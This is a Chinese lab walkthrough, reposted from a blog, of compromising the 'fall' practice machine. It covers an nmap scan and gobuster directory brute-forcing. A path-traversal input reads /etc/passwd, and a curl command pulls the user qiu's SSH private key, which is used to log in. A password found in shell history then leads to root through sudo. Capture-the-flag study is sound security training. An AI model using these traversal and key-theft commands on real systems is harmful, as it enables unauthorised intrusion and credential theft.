欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 新闻 > 焦点 > fall靶机攻略

fall靶机攻略

2025/4/3 7:08:12 来源:https://blog.csdn.net/qq_64470109/article/details/146568791  浏览:    关键词:fall靶机攻略

1、扫描靶机地址

nmap c段

2、访问IP

3、爆破目录

gobuster dir -u http://192.168.19.164 -x html,zip,bak,txt,php --wordlist=/usr/share/wordlists/dirb/common.txt

扫到这么多,依次看一下响应码是200的目录,最终在robots.txt看到了

暂时还不知道这是什么信息,但是先有个印象,然后我在text.php看到了

告诉我们缺少get参数,说明这里是get传参的,我们尝试一下有没有文件读取漏洞

?file=../../../../../../etc/passwd

说明这里是存在任意文件读取漏洞的,我们看一下里面的信息,发现了用户qiu

去查看他的秘钥

用:curl http://192.168.19.164/test.php?file=/home/qiu/.ssh/id_rsa > id_rsa导出秘钥,再用cat查看:cat id_rsa

为秘钥文件提权

chmod 600 id_rsa

可以看到已经提权了,接着利用秘钥登录这个qiu用户

ssh qiu@192.168.19.164 -i id_rsa

进来之后先查看一下有什么文件

然后去看看这些文件都有什么信息

在历史记录文件发现这个用户输出了remarkablyawesomE并上传了,然后就执行了ifconfig,那可能这个就是密码,用户登上去之后就查看IP,我们尝试一下

输入sudo -l ,把密码输入进去

确实可以,而且权限是和root一个级别的,那么我们切换到root用户,查看文件

sudo su切换到root用户,cat ~/remarks.txt查看flag

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

热搜词